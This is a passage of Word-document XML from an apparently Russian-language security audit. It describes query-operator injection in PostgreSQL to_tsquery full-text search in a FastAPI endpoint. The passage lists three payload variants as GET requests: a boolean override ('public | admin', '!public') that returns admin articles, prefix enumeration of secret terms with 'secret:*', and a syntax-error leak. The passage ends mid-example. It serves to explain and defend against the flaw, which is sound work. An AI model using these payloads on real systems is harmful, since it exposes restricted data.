        <w:t xml:space="preserve"> — LIKE-pattern часто используется как WAF-bypass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не содержит обычных SQL keywords).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escape-helpers и trigram-index recommendations.</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«Pattern Matching» / LIKE — https://www.postgresql.org/docs/current/functions-matching.html#FUNCTIONS-LIKE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«pg_trgm» — https://www.postgresql.org/docs/current/pgtrgm.html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OWASP: «SQL Injection Prevention Cheat Sheet» (раздел «Special characters in LIKE») — https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html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Wiki: «Don't Do This» / «Misuse of LIKE» — https://wiki.postgresql.org/wiki/Don't_Do_This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SQLAlchemy Docs: «Operators» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">like_op</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://docs.sqlalchemy.org/en/20/core/operators.html#sqlalchemy.sql.expression.ColumnOperators.like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CWE-93: «Improper Neutralization of CRLF Sequences» (родственный класс — semantic injection) — https://cwe.mitre.org/data/definitions/93.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15.2 to_tsquery — операторы как boolean-override и syntax-error канал</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to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функция полнотекстового поиска PostgreSQL, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">парсит входной string как полный operator-язык</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Operators: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(OR),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(NOT), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FOLLOWED BY), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;N&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FOLLOWED BY с distance N),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(prefix matching), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">:LANG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lexeme class), parens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Когда приложение принимает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от пользователя и передаёт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE search_vector @@ to_tsquery(:q)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через bind — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">operators парсятся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и payload типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">admin &amp; superuser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> меняет boolean-логику запроса. Дополнительно: syntax-invalid input даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error in tsquery: "..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">leaked input в text ошибки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — error-based channel для extraction (см. 3.15.4).</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app/api/v1/articles.py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Query,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@router.get("/articles/search")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search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1),</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to_tsquery с user-input через bind</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title, ts_rank(search_vector, to_tsquery('english', :q)) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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to_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY rank DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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{"q": q})</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Bind-параметр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корректно защищает от SQL-injection (no quote-escape возможен), но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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сама</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> парсит operators в значении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — три варианта</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант A — Boolean override (изменение match-логики):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарий: приложение использует FTS для поиска статей в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">published</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-статусе (через WHERE-clause). Но если индекс search_vector построен из title + body, и admin-статьи имеют title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin: dashboard config"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поиск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q=public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> находить admin-статьи. Атакующий обходит фильтр через operator-override:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=public%20%7C%20admin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = "public | admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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WHERE search_vector @@ to_tsquery('english', 'public | admin')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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парсит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">public OR admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — теперь матчит статьи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">либо с public, либо с admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий читает admin-статьи через FTS-эндпоинт, который не должен их возвращать.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Более тонкий вариант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-operator для negation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=!public</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery('english', '!public')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → матчит статьи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без слова public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — извлечение всего набора, кроме publicly-tagged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">**Вариант B — Prefix-extraction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GET /articles/search?q=secret:*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery('english', 'secret:*')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → матчит любое слово, начинающееся с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">secret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secret_key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secrets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secret_token</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Эффективное </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> конфиденциальных терминов в текстовом корпусе. При сочетании с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атакующий итерирует:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=secret_a:*    → match articles containing "secret_a*"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=secret_b:*    → no match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=secret_c:*    → match</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Position-by-position extraction наличия конкретных prefix-ов — alphabet-walking attack на текстовый контент.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Вариант C — Syntax error → information leak:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /articles/search?q=admin%20%26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = "admin &amp;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (admin followed by trailing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без operand). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
